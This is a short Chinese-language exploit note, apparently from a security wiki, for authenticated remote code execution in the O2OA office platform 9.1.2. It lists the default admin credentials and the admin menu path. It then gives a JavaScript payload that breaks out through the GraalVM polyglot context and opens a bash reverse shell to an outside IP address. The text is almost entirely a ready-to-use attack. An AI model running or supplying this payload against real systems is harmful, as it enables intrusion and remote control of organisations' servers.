o2oa
O2OA 是一款开源的企业级协同办公(OA)平台,采用 J2EE 架构,不仅提供开箱即用的办公功能,还是一个支持低代码开发的业务平台
https://github.com/o2oa/o2oa
默认密码:xadmin/o2oa@2022
1. o2oa 后台RCE
CloudNet > 1.1. o2oa 后台RCE
9.1.2版本
后台-》服务管理-》接口编辑
(function() {
var Polyglot = Java.type('org.graalvm.polyglot.Context');
var context = Polyglot.newBuilder()
.allowAllAccess(true)
.build();
var result = context.eval('js', `
var Runtime = Java.type('java.lang.Runtime');
var BufferedReader = Java.type('java.io.BufferedReader');
var InputStreamReader = Java.type('java.io.InputStreamReader');
var runtime = Runtime.getRuntime();
var process = runtime.exec(["/bin/bash", "-c", "bash -i >& /dev/tcp/124.71.111.64/11222 0>&1"]);
var reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
var line;
var output = "";
while ((line = reader.readLine()) !== null) {
output += line + "\\n";
}
process.waitFor();
output;
`);
var responseResult = {
"Result": result
};
this.response.setBody(responseResult, "application/json");
})();
这里保存成功后,点击执行即可。 没保存成功就刷新一下页面